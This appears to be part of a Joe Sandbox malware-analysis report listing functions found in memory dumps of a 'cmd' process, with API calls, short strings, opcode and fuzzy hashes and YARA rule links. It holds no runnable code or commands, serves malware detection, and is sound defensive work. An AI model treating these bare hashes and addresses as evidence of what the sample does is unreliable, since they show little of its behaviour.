Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 7e2e6ccf2d6b99bdf25f5526e77430cc9d90bf30b910f66c08a1e46288b86557
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: A751AC3231960AEAEF54CB25E445BBC77B2E354B98F948131EB6B47788DB79C841C701

Function 000001F1197D8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F1197D8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F1197D8D62
RtlUnwindEx.NTDLL ref: 000001F1197D8DBC

Strings

csm, xrefs: 000001F1197D8D49

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: caca30618d2c3af37abfa9b2703f2bb75a11daf8dd769027a199042a49286ef6
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 47516B33219602EADB548B29E444BFC77D2FB58BD8F944121DB6B47788DB78C849CB01

Function 000001F119D5A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001F119D5A75B
_CallSETranslator.LIBVCRUNTIME ref: 000001F119D5A7A7

Strings

MOC, xrefs: 000001F119D5A76F
RCC, xrefs: 000001F119D5A777

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 6ca5a59052bbb629dd9e6bf8f62479fa36dad10ff45875d764e2ec395e30cf09
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 8D61A132508BC9D1EF308F25E4407EABBB1F795B94F844225EBA917B99DB78C190CB01

Function 000001F119D5AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F119D5AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001F119D5ABBC

Strings

csm, xrefs: 000001F119D5AC0E
csm, xrefs: 000001F119D5AAF6

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: d54ab1ad7a4aac89675e81e00d7e332d3897c339d6693f567e566c741d8a89bd
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 89519D3610839AEBFF648F3295443B877B6F355B84F944126DBAA47B95CB38C450C742

Function 000001F1197DA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001F1197DA75B
_CallSETranslator.LIBVCRUNTIME ref: 000001F1197DA7A7

Strings

MOC, xrefs: 000001F1197DA76F
RCC, xrefs: 000001F1197DA777

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 9d2b7b154a80372f384b2a87cf180299b34813c23b8b01e6650307e5dc32377b
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 8E618C33508BC5D5EB259B25E4403EEB7A1FB85BD4F844225EBAA13B95DB78C198CF00

Function 000001F1197DAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F1197DAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001F1197DABBC

Strings

csm, xrefs: 000001F1197DAAF6
csm, xrefs: 000001F1197DAC0E

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: e076238797027a85e732e23aedb4f8ca6dbd65138c0d644f5ed1c13424e0e89a
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 2A51AF33208382EBEB689B3195443AC7BE6FB54BD4F944125DBAA43B91DB38C459CF01

Function 000001F119799EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F119799ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001F119799FBC

Strings

csm, xrefs: 000001F11979A00E
csm, xrefs: 000001F119799EF6

Memory Dump Source

Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 9fc2afec4a717a588f7577aa43125f78d6d22e61102e86927c79f0503f3a33c9
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 4D519F32108742EAEF789B3591443A8B7A2EB55BE4F944125DBAA47B85EB38C458CF01

Function 000001F119D53950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001F119D53972
StrStrW.SHLWAPI ref: 000001F119D53990
StrToIntW.SHLWAPI ref: 000001F119D539B7

Part of subcall function 000001F119D51A30: OpenProcess.KERNEL32 ref: 000001F119D51A56
Part of subcall function 000001F119D51A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001F119D51A74
Part of subcall function 000001F119D51A30: PathFindFileNameW.SHLWAPI ref: 000001F119D51A83
Part of subcall function 000001F119D51A30: lstrlenW.KERNEL32 ref: 000001F119D51A8F
Part of subcall function 000001F119D51A30: StrCpyW.SHLWAPI ref: 000001F119D51AA2
Part of subcall function 000001F119D51A30: CloseHandle.KERNEL32 ref: 000001F119D51AB0

Part of subcall function 000001F119D53F88: StrCmpNIW.SHLWAPI(?,?,?,000001F119D5272F), ref: 000001F119D53FA0

Strings

pid_, xrefs: 000001F119D53968

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 593c2593a998de5c385a7fd854b0f8664597d44e72d7e6bc281c2c985baa3725
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 32117F31318786F2FF10AB35E8403FAA2B6B784780FC040359B6A93695EF69C945C740

Function 000001F1197D3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001F1197D3972
StrStrW.SHLWAPI ref: 000001F1197D3990
StrToIntW.SHLWAPI ref: 000001F1197D39B7

Part of subcall function 000001F1197D1A30: OpenProcess.KERNEL32 ref: 000001F1197D1A56
Part of subcall function 000001F1197D1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001F1197D1A74
Part of subcall function 000001F1197D1A30: PathFindFileNameW.SHLWAPI ref: 000001F1197D1A83
Part of subcall function 000001F1197D1A30: lstrlenW.KERNEL32 ref: 000001F1197D1A8F
Part of subcall function 000001F1197D1A30: StrCpyW.SHLWAPI ref: 000001F1197D1AA2
Part of subcall function 000001F1197D1A30: CloseHandle.KERNEL32 ref: 000001F1197D1AB0

Part of subcall function 000001F1197D3F88: StrCmpNIW.SHLWAPI(?,?,?,000001F1197D272F), ref: 000001F1197D3FA0

Strings

pid_, xrefs: 000001F1197D3968

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 1791c52605e6dd3ad13faa202fb22ea0365300e854e57fa0aa4c22c74099d00f
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: AD111F32318792E1FB109B35E8413EE52E6BF847C4FD44435EB6A93699EF69C909CB00

Function 000001F119D61FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001F119D62027
WriteFile.KERNEL32 ref: 000001F119D62304
WriteFile.KERNEL32 ref: 000001F119D6234A
GetLastError.KERNEL32 ref: 000001F119D62409

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 0187543c796b829238ac692c5e0d014b40441302505adc5c6f2e512a39fbf18d
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: C5D1D232718A89D9EB11CFB5D5442EC37B2F354B98F844226DF6E97B99DA34C146C380

Function 000001F1197E1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001F1197E2027
WriteFile.KERNEL32 ref: 000001F1197E2304
WriteFile.KERNEL32 ref: 000001F1197E234A
GetLastError.KERNEL32 ref: 000001F1197E2409

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 30e60218249b0fecb6468395d0a9815f26cec6d2d2211726d3a4cb2db23b2707
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: A2D1BC32718A95EAE711CBB5D4402EC37B2FB45BD8F844126CF6E97B99DA34C50ACB40

Function 000001F119D514A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F119D514C6
HeapFree.KERNEL32 ref: 000001F119D514D5
GetProcessHeap.KERNEL32 ref: 000001F119D514E2
HeapFree.KERNEL32 ref: 000001F119D514F1
GetProcessHeap.KERNEL32 ref: 000001F119D51501

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 1661870e5b9bade6fbdfa9722be91761fefd77572138c71076725b4710dc5f94
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 41016932615B85EAEB14DF76E8041A977A2F789F80B894035DF6A43728DF38D491C780

Function 000001F1197D14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F1197D14C6
HeapFree.KERNEL32 ref: 000001F1197D14D5
GetProcessHeap.KERNEL32 ref: 000001F1197D14E2
HeapFree.KERNEL32 ref: 000001F1197D14F1
GetProcessHeap.KERNEL32 ref: 000001F1197D1501

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 7d513b44c6e7b97723e2dcae595bd5cfd40390db5bd993160c1543ed17bb9cb2
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 1A012D32614B95EADB14DF66E8041A977B2FB88FC0B494035DF5A53714EF34D455CB40

Function 000001F119D628F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001F119D628DF), ref: 000001F119D62A12

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: bfbf21c97edfa9ac49edf96444abb8ba27582ecc4fecadc38fc6d058470443b2
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 3C91E43271865AE9FF648F7594503FD2BA2F395B88F844126DF6BA3A89DB34C445C340

Function 000001F1197E28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001F1197E28DF), ref: 000001F1197E2A12

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 98c7e07e0e7d4f17f01d19fde8529946b816e95c4aa7fdd8142ee534952e0eb6
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 3F91F232718662E9FB608F7594503FD2BA2BB44BC8F84512ADF2B67694EA34C449CB00

Function 000001F119D58090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001F119D580BC
GetCurrentThreadId.KERNEL32 ref: 000001F119D580CA
GetCurrentProcessId.KERNEL32 ref: 000001F119D580D6
QueryPerformanceCounter.KERNEL32 ref: 000001F119D580E6

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 57ee1d7fd5bce0a79f59a3f373a24279549984caa6ba4a6fd04847dbdfd01b11
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 81111536714F0ADAEF00CB70E8553A833A4F719768F840E31EB6E867A4DB78C1948380

Function 000001F119D527E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F119D528CC
StrCpyW.SHLWAPI ref: 000001F119D528E5

Part of subcall function 000001F119D53F88: StrCmpNIW.SHLWAPI(?,?,?,000001F119D5272F), ref: 000001F119D53FA0

Strings

\\.\pipe\, xrefs: 000001F119D528D7

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: e2bd8ce15a067fea017b737ed8deff2502d325846d3c62649e4e6aaeb0d9b635
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: D7716036608B87E1FF759E3698543FA66A6B395BC4F840026EF2B57B58DE34C604C740

Function 000001F1197D27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F1197D28CC
StrCpyW.SHLWAPI ref: 000001F1197D28E5

Part of subcall function 000001F1197D3F88: StrCmpNIW.SHLWAPI(?,?,?,000001F1197D272F), ref: 000001F1197D3FA0

Strings

\\.\pipe\, xrefs: 000001F1197D28D7

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 77c259268ef0706f6e5081c934b482686296ee93083ed8c24db98bc15796bdc4
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 09716037208B53A1E6749A3698543FE67D6FB857D4F940036DE2B53B85DA35C609CB00

